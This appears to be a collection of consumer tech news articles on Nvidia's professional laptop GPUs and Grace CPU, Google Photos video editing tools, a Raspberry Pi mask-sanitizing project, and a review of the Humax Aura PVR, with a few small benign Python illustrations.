The higher-end mobile Nvidia RTX A5000 has 6,144 CUDA cores and 16GB of GDDR6, while the RTX A4000 has 5,120 CUDA cores and 8GB of GDDR6. These are essentially the mobile GeForce RTX 3080/3070, but with drivers certified by ISVs for professional applications. Performance of these GPUs tops out at 21.7 and 17.8 FP32 TFLOPS, respectively.
By contrast, the RTX A3000 with 4,096 CUDA cores and 6GB of memory seems to be a rather unique solution, as it has more execution units than the GeForce RTX 3060 yet features a similar 192-bit memory interface. As for performance, it tops out at 12.8 FP32 TFLOPS. Meanwhile, the entry-level RTX A2000 with 2,560 CUDA cores and 4GB of GDDR6 memory offers up to 9.3 FP32 TFLOPS.
All of these GPUs are rated for a wide TGP range (e.g., the RTX A5000 can be limited to 80W or allowed up to 165W) and support Max-Q, Dynamic Boost, and WhisperMode technologies, so expect the actual performance of Nvidia's RTX A-series GPUs to vary from design to design, just as it does with their GeForce RTX counterparts.
Nvidia expects its partners among manufacturers of mobile workstations to adopt its new RTX A-series solutions this quarter.
Some New Turings Too
In addition to new Ampere-based professional graphics solutions for desktops and laptops, Nvidia also introduced its T1200 and T600 laptop GPUs, which likewise come with drivers certified by developers of professional applications. These products use unspecified Turing silicon and are mostly designed to replace integrated graphics, so they do not offer very high performance and lack both RT and Tensor cores.
Android’s Google Photos app is being updated with the improved video editing tools that were previously exclusive to iOS. Android Police spotted the rollout, and reports that it appears to be available for both Google Pixel devices and other Android phones. The tools appear to have arrived with a server-side update, though you can try updating to the latest version of Google Photos if they’re not yet live in your app.
As Google explained back in February, the new video editing tools include over 30 controls, covering everything from cropping and filters to color grading options such as contrast, saturation, and brightness adjustments.
The video editing tools are arriving on Android as Google’s Photos service is going through some big changes. As part of its February announcement, the company said it would be bringing some machine-learning powered editing tools previously exclusive to Pixel devices to other Android phones, but only for Google One subscribers. Next, in June, Google Photos will end its unlimited free photo storage, and will ask users to pay for storage beyond 15GB. The app is getting more powerful, but increasingly you’re having to pay for more advanced features.
As well as announcing that the iOS video editing tools would be coming to Android, in February Google also said Android’s new photo editing tools would be making their way to iOS. Google announced they’d be arriving “in the coming months,” but as of this writing they don’t appear to be live.
Nvidia introduced its Arm-based Grace CPU architecture that the company will use to power two new AI supercomputers. Nvidia says its new chips deliver 10X more performance than today’s fastest servers in AI and HPC workloads.
The new Grace CPU architecture comes powered by unspecified “next-generation” Arm Neoverse CPU cores paired with LPDDR5x memory that pumps out 500 GBps of throughput, along with a 900 GBps NVLink connection to an unspecified GPU for the leading-edge devices. Nvidia also revealed a new roadmap (below) that shows a “Grace Next” CPU coming in 2025, along with a new “Ampere Next Next” GPU that will arrive in mid-2024.
Notably, Nvidia named the Grace CPU architecture after Grace Hopper, a famous computer scientist. Nvidia is also rumored to be working on its chiplet-based Hopper GPUs, which would make for an interesting pairing of CPU and GPU codenames that we could see more of in the future.
Nvidia's pending Arm acquisition, which is still winding its way through global regulatory bodies, has led to plenty of speculation that we could see Nvidia-branded Arm-based CPUs. Nvidia CEO Jensen Huang confirmed that was a distinct possibility, and while the first instantiation of the Grace CPU architecture doesn't come as a general-purpose design in the socketed form factor we're accustomed to (instead coming mounted on a board with a GPU), it is clear that Nvidia is serious about deploying its own Arm-based data center CPUs.
Nvidia hasn’t shared core counts or frequency information yet, which isn’t entirely surprising given that the Grace CPUs won’t come to market until early 2023. The company did specify that these are next-generation Arm Neoverse cores. Given what we know about Arm’s current public roadmap (slides below), these are likely the V1 Platform ‘Zeus’ cores, which are optimized for maximum performance at the cost of power and die area.
Chips based on the Zeus cores will come in either 7nm or 5nm flavors and offer a 50% increase in IPC over the current Arm N1 cores. Nvidia says its Grace CPU will have plenty of performance, with a projected score of 300+ in the SPECrate_2017_int_base benchmark. That's impressive for a freshman effort, though AMD's EPYC Milan chips, the current performance leader in the data center, have posted results ranging from 382 to 424, putting Grace more on par with the 64-core AMD Rome chips. Given Nvidia's '10X' performance claims relative to existing servers, it appears the company is referring primarily to GPU-driven workloads.
The Arm V1 platform supports all the latest high-end tech, like PCIe 5.0, DDR5, and either HBM2e or HBM3, along with the CCIX 1.1 interconnect. It appears that, at least for now, Nvidia is utilizing its own NVLink instead of CCIX to connect its CPU and GPU.
As we can see above, the first version of the Nvidia Grace CPU will come as a BGA package (meaning it won't be a socketed part like traditional x86 server chips), flanked by what appear to be eight packages of LPDDR5x memory. Nvidia says that LPDDR5x ECC memory provides twice the bandwidth and 10x better power efficiency than standard DDR4 memory subsystems.
Nvidia's next-generation NVLink, which it hasn't shared many details about yet, connects the CPU to the adjacent GPU with a 900 GBps transfer rate (14X faster), outstripping the data transfer rates that are traditionally available from a CPU to a GPU by 30X. The company also claims the new design can transfer data between CPUs at twice the rate of standard designs, breaking the shackles of suboptimal data transfer rates between the various compute elements, like CPUs, GPUs, and system memory.
The graphics above outline Nvidia’s primary problem with feeding its GPUs with enough bandwidth in a modern system. The first slide shows the bandwidth limitation of 64 GBps from memory to GPU in an x86 CPU-driven system, with the limitations of PCIe throughput (16 GBps) exacerbating the low throughput and ultimately limiting how much system memory the GPU can utilize fully. The second slide shows throughput with the Grace CPUs: With four NVLinks, throughput is boosted to 500 GBps, while memory-to-GPU throughput increases 30X to 2,000 GBps.
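Those multipliers are easy to sanity-check from the bandwidth figures quoted in the slides; a quick sketch (all numbers are Nvidia's, in GBps, and the round '30X' works out to 31.25 exactly):

```python
# Bandwidth figures quoted in Nvidia's slides, in GBps.
x86_memory_to_gpu = 64      # system memory -> GPU in a typical x86 server
pcie_cpu_to_gpu = 16        # CPU <-> GPU over PCIe in the same system
grace_nvlink = 500          # CPU <-> GPU over four NVLinks with Grace
grace_memory_to_gpu = 2000  # system memory -> GPU with Grace

# Ratio of NVLink throughput to the PCIe path it replaces.
print(f"NVLink vs PCIe: {grace_nvlink / pcie_cpu_to_gpu:.0f}X")
# Ratio of memory-to-GPU throughput, the '30X' claim in the text.
print(f"Memory-to-GPU: {grace_memory_to_gpu / x86_memory_to_gpu:.0f}X")
```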
The NVLink implementation also provides cache coherency, which brings the system and GPU memory (LPDDR5x and HBM) under the same memory address space to simplify programming. Cache coherency also reduces data movement between the CPU and GPU, thus increasing both performance and efficiency. This addition allows Nvidia to offer similar functionality to AMD’s pairing of EPYC CPUs with Radeon Instinct GPUs in the Frontier exascale supercomputer, and also Intel’s combination of the Ponte Vecchio graphics cards with the Sapphire Rapids CPUs in the Aurora supercomputer, another world-leading exascale supercomputer.
Nvidia says this combination of features will reduce the time it takes to train GPT-3, the world's largest natural language AI model, on the 2.8-AI-exaflops Selene, the world's current fastest AI supercomputer, from fourteen days to just two.
Nvidia also revealed a new roadmap that it says will dictate its cadence of updates over the next several years, with GPUs, CPUs (Arm and x86), and DPUs all co-existing and evolving on a steady cadence. Huang said the company would advance each architecture every two years, with a possible “kicker” generation in between, which likely will consist of smaller advances to process technology rather than architectures.
The US Department of Energy’s Los Alamos National Laboratory will build a Grace-powered supercomputer. This system will be built by HPE (the division formerly known as Cray) and will come online in 2023, but the DOE hasn’t shared many details about the new system.
The Grace CPU will also power what Nvidia touts as the world’s most powerful AI-capable supercomputer, the Alps system that will be deployed at the Swiss National Computing Center (CSCS). Alps will primarily serve European scientists and researchers when it comes online in 2023 for workloads like climate, molecular dynamics, computational fluid dynamics, and the like.
Given Nvidia's interest in purchasing Arm, it's natural to expect the company to begin broadening its relationships with existing Arm customers. To that end, Nvidia will also bring support for its GPUs to Amazon Web Services' powerful Graviton2 Arm chips, a key addition as AWS's adoption of the Arm architecture has led to broader uptake for cloud workloads.
A used face mask brought home can harbor unseen and unwanted bacteria. But we've noticed something over the years: where there's a problem, there's a Raspberry Pi solution! Today's project tackles this issue and is known as the Box of Hope, developed by Jan-Hendrik Ewers, Sarah Swinton, and Martin Karel.
The best Raspberry Pi projects help make life easier, and this project takes a lot of guesswork out of mask sanitization. The Box of Hope has a sanitizing chamber that utilizes UV LEDs to sterilize fabric face masks. It also relies on wireless technology to issue daily usage reminders.
According to the dev team, the project was designed to be a box kept at the user’s home. It’s connected to the internet, which is necessary to send sanitization reminders to a given mobile device.
There are three major components in the project design: an API, a web app, and an I/O server. The RESTful API manages HTTP requests between the client and server. The I/O server runs on the Pi while the web app manages notifications.
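That split between a RESTful API, a web app, and an I/O server can be sketched with a tiny, stdlib-only example. Everything here is illustrative: the `/events` and `/status` routes and their payloads are our invention, not taken from the project's actual code, which lives in the GitHub repository linked below.

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

events = []  # in-memory sanitization log; the real project presumably persists this

class ReminderAPI(BaseHTTPRequestHandler):
    # Hypothetical routes: the Pi's I/O server POSTs a sanitization event,
    # and the web app GETs /status to decide whether to push a reminder.
    def do_POST(self):
        if self.path == "/events":
            body = self.rfile.read(int(self.headers["Content-Length"]))
            events.append(json.loads(body))
            self._reply(201, {"count": len(events)})

    def do_GET(self):
        if self.path == "/status":
            self._reply(200, {"needs_reminder": len(events) == 0})

    def _reply(self, code, obj):
        data = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request console logging
        pass

# Run the server on an ephemeral port and exercise both routes once.
server = HTTPServer(("127.0.0.1", 0), ReminderAPI)
threading.Thread(target=server.serve_forever, daemon=True).start()
base = f"http://127.0.0.1:{server.server_address[1]}"

# No events logged yet, so the client should be reminded to sanitize.
status = json.load(urllib.request.urlopen(f"{base}/status"))
print(status)

# The I/O server reports a completed UV cycle; the reminder clears.
req = urllib.request.Request(f"{base}/events",
                             data=json.dumps({"mask": "fabric-1"}).encode(),
                             method="POST")
urllib.request.urlopen(req)
status = json.load(urllib.request.urlopen(f"{base}/status"))
print(status)
server.shutdown()
```

The real project sends push notifications to a phone rather than serving polled status, but the request flow between the three components is the same shape.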
If you want to read more about this project, visit the official Box of Hope website and project GitHub page.
As a Freeview PVR, the Humax Aura is hard to beat, but its incomplete smart platform requires a pause for thought
For
Excellent recording and playback
Full-bodied, exciting sound
Useful Aura mobile app
Against
No Netflix app
HDR picture could be better
User interface a touch convoluted
Even without an Oxbridge education, the Humax Aura PVR has managed to achieve a double first. It’s the first Freeview set-top box from Humax to use the Android TV operating system and also the first to be 4K HDR-enabled. How could we not be intrigued?
The Humax Aura can be a number of things to different people and it feels as though it has been priced to interest everyone. The most obvious use is as a Freeview Play recorder, with enough internal storage options to capture hours of live Full HD and standard-definition television.
With its Android TV platform, you can also use it as a Chromecast with benefits – a way of adding over 5000 apps and streaming services to feed your television or projector with plenty of 4K fun. With its USB sockets, hi-res audio and 3D home cinema codec support, there’s an option to use it for local film file playback too – it’s quite the box of tricks.
Pricing
The Humax Aura costs £249 for the 1TB model, which can store up to 250 hours of HD (or 500 of SD) programming, and £279 for the 2TB model, which can store up to 500 hours of Full HD (1000 of SD) programming.
If you’re serious enough about live TV to want to record it on a regular basis, then the extra £30 for double the amount of space feels like a no-brainer.
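Those capacity claims imply Humax is budgeting roughly 9 Mbps per HD recording; a quick back-of-the-envelope check (this derivation is ours, not a Humax spec):

```python
# 1 TB holding 250 hours of HD implies about 4 GB per recorded hour.
drive_gb = 1000   # decimal terabyte, as drive makers count it
hd_hours = 250
gb_per_hour = drive_gb / hd_hours        # 4.0 GB per hour
mbps = gb_per_hour * 8 * 1000 / 3600     # GB/hour -> megabits per second
print(f"{mbps:.1f} Mbps")                # ~8.9 Mbps, plausible for a Freeview HD stream
```

The SD figures (500 hours per terabyte) work out to exactly half that rate, which is consistent with the box simply recording the broadcast stream as-is.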
Features
Humax has had great success with its What Hi-Fi? Award-winning FVP-5000T set-top box and, four years down the line, a replacement has been long overdue. For both specs and looks, the Aura is the upgrade we’ve been waiting for.
Stand the two next to one another and the sculpted lines of the low slung Aura more easily fit into the category of contemporary industrial design.
The Aura is a tidy 26cm by 20cm box that takes up about the same space as your wi-fi router. Its gloss black body is accented by an LED strip on the underside, which changes from red to blue to violet to orange depending on whether it's off, on, recording, or recording in standby. It's a useful indicator and, in standby mode, reminiscent of K.I.T.T. from Knight Rider.
But if it’s a party at the front of the Aura, then around the back is the serious business. Here you’ll find the single HDMI 2.1-out along with USB 3.0 and USB 2.0 (Type A) sockets for local media. There’s also an optical audio-out and a LAN connection if you’d rather leave the 2.4/5GHz wi-fi alone.
The Aura remote is fully featured, with dedicated buttons for just about everything you could need, including shortcuts to streaming services, recordings, the guide, the Freeview Play platform and the Android TV homepage too. You’ll need to pair the remote with the Aura box using Bluetooth for the Google Assistant voice system to work.
Humax Aura tech specs
Tuners x3
Ports HDMI 2.1, USB 3.0, USB 2.0, optical-out
OS Android TV 9
Freeview Play Yes
Storage 1TB/2TB
Dimensions (hwd) 4.3 x 26 x 20cm
Weight 764g
The Humax Aura’s three Freeview Play tuners bring access to over 70 non-subscription live TV channels and over 20,000 hours of on-demand entertainment through the catch-up services, with BBC iPlayer, ITV Hub, All 4 and My5 all present. Those tuners allow you to pause and rewind TV, as well as record up to four channels while watching a fifth one live.
Unlike the older FVP-5000T, there’s no built-in app for streaming live TV or your recordings from the box to other devices around your home, though Humax says the same DLNA support will be added to the Aura in a forthcoming firmware update. The Aura mobile app will detect any DLNA or Chromecast-enabled devices on the same network as your box and allow you to play recordings or live channels to those, sourcing it from the Aura as a server.
For the time being, the Aura mobile app is a handy tool in its own right. It brings a full view of the electronic programme guide (EPG) to your small screen and allows users to schedule recordings, watch recordings and even enjoy live TV on mobile – just the ticket for keeping track of Countdown while you put the kettle on.
The Aura’s big-screen offering is also bolstered by Android TV, and that means another 5000 or so apps from Google Play are at your disposal, with subscription services such as Disney+ and Amazon Prime Video, alongside more UK-specific apps, such as BT Sport and UKTV Play.
There are significant gaps, though, including Britbox, Now TV and the Netflix app. Somewhat ironically, Netflix is actually one of the few non-catch-up apps available on the older FVP-5000T. Fortunately, the Aura’s built-in Chromecast functionality allows users to cast these missing apps from mobile, tablet or browser instead, but that solution won’t suit everyone. It’s also worth noting that casting won’t work for either Apple TV or Apple Music, which are also missing from the Aura.
Away from the video side, the hi-res audio support is a welcome addition. It means those connecting the Aura to a decent external speaker system can get a strong performance from locally stored or streamed audio files, even if connecting through the HDMI, which can handle up to 24-bit/192 kHz levels.
You’ll need to download a third-party app such as VLC to play local media and Plex if you want to connect a NAS drive or similar from your home network. The Aura’s support for 4K HDR (HDR10 and HLG) and 3D audio codecs offers the potential to do justice to any high-quality movie files you own.
Thanks to the quad-core 1.8GHz CPU and 3GB RAM combo, the whole experience feels snappy and well put together. From the remote to the on-screen navigation, the user experience will bend to your bidding without complaint.
The twinning of Freeview Play and Android TV 9.0 doesn’t make for the easiest of combinations, though. Each offers its own home page experience, leaving the user unsure as to which one to use. You’ll find some apps on both, but others just on one, and both home pages have their own settings menus. Fortunately, the shortcuts on the remote mean that you can sometimes go straight to whatever it is that you’re looking for, but that doesn’t really excuse the poor integration of the two interfaces.
Each interface is good in its own right, at least. We particularly like Freeview Play’s Kids’ Zone – a brightly coloured area with TV programmes specially selected for younger viewers. Content can be searched according to duration and timeslot, and parents can use this to block certain apps and channels from appearing.
Picture
The picture quality through the Freeview Play tuners in both SD and Full HD is every bit as good as that of the FVP-5000T. Watching Put Your Money Where Your Mouth Is on BBC2, we get some inviting shots of a French antiques market on a cloudless summer’s day. The cobbled streets and stalls are bright and colourful, but with a realistic sense of tonality and texture.
The Aura trades a touch of detail for this better blending and, while some might prefer harder edges to stone walls, it feels like a well-judged decision from Humax. There’s a proper sense of complexity to the bright blue TV shelf as one of the bargain hunters haggles over a few Euros. It makes for a more natural aesthetic to the picture and feels believable when upscaled to 4K.
That arrangement is justified even further when switching to SD on the BBC News channel. Low-res content can seem particularly harsh and blocky when upscaled, but the Aura’s slightly softer approach smooths out a few more of those unwanted edges than its predecessor and adds some much-needed subtlety to clothing colours and skin tones.
However, the app platform is not quite as adept. Compared with a budget streaming stick, the Aura’s skill with a 4K HDR app is a little less assured than it might be. We watch The Boys on Prime Video and while the picture is punchy and dynamic, some of the finer detail is lost, particularly at the brightest and darkest extremes of the contrast spectrum. Viewing a scene set in the White House, the backlit silk curtains are missing folds in the material and the Aura doesn’t reveal the number of freckles on ex-CIA Deputy Director Grace Mallory’s skin that we might expect.
The other slight drawback is that not all users will find the dynamic range and refresh rate content-matching system easy to use. There are a few options and, without the right ones selected, app TV shows and films are often displayed incorrectly, with juddery motion and jumpy streams. It can be fixed using the remote while viewing, but it isn't easy to do. Quality standalone streamers have options to automatically match the dynamic range and refresh rate of the source material, and the Aura should really have the same.
Sound
The Aura’s hi-res music support offers an excellent opportunity to get good quality sound from this box through both locally stored files and streamed music services. Plugging it into our reference system, we fire up the Tidal Masters version of Fortunate Son by Creedence Clearwater Revival and, by the standards of PVRs and video streamers, we’re struck by how well it captures the recording.
There’s a spacious sound to the vocals and guitars that gives a fabulous feel to the acoustics of the room where the recording was made. Compared with other, similarly priced streaming products, there is an added dimension to the track. There’s a good dose of dynamics that brings excitement and character to all of the instruments. We can visualise the drums at the start of the track and every time the first snare of each bar is hit with an accent.
The back and forth between the guitar and the vocals is like listening to a conversation. It’s a cohesive sound from top to bottom and we feel confident that there’s little we’re missing in the music. Some streamers at this level might offer a touch more crispness to the rhythm, but not without some loss of the excitement we get with the Aura.
All of that translates to an enjoyably emotional feel for home cinema as we switch to AV with the Live Aid scene at the end of Bohemian Rhapsody on Prime Video. The thuds of the kick drum are wonderfully solid and offer a genuine sense of timbre and resonance as the pedal first hits the skin at the beginning of the set.
When Brian May plays his solo at the end of the piece, it’s like he’s making his guitar sing. Again, the sense of place is captured brilliantly in a credible rendition of the sound of the old Wembley Stadium full of 72,000 people clapping in time and singing along to Radio Ga Ga.
Sound such as this is a huge leg up for any home cinema device. Whether capturing the atmosphere of a rock concert or the special effects of an action scene, the Aura really delivers on this front.
Verdict
The Humax Aura does its main job well. It’s an excellent Freeview recorder for both Full HD and standard definition with an easy-to-use TV guide, plenty of space and handy remote recording features. The problem is that Humax has offered – and is charging – more this time around and this box doesn’t deliver these extras quite so well.
If you’re going to promise more apps, then the omission of the most popular one of all is an issue. You also need to make sure your handling of streamed TV and film content is up to the same high standards as the competition, and that isn’t quite the case with the Aura. Tacking on the Android TV platform also means that the overall user interface loses a little focus.
While the Aura is spot on for sound, opting for the cheaper but still brilliant Humax FVP-5000T and buying a Google Chromecast with Google TV as well is a better option in terms of overall performance. The experience won’t feel much more split than the Aura already does but, more importantly, the smart offering will be more complete and a little better for picture quality too.
That said, if you have your heart set on a single box solution for your TV recording and video streaming, the Aura is a solid choice.
SCORES
Picture 4
Sound 5
Features 4
MORE:
Read our guide to the best set-top boxes
Read our Humax FVP-5000T review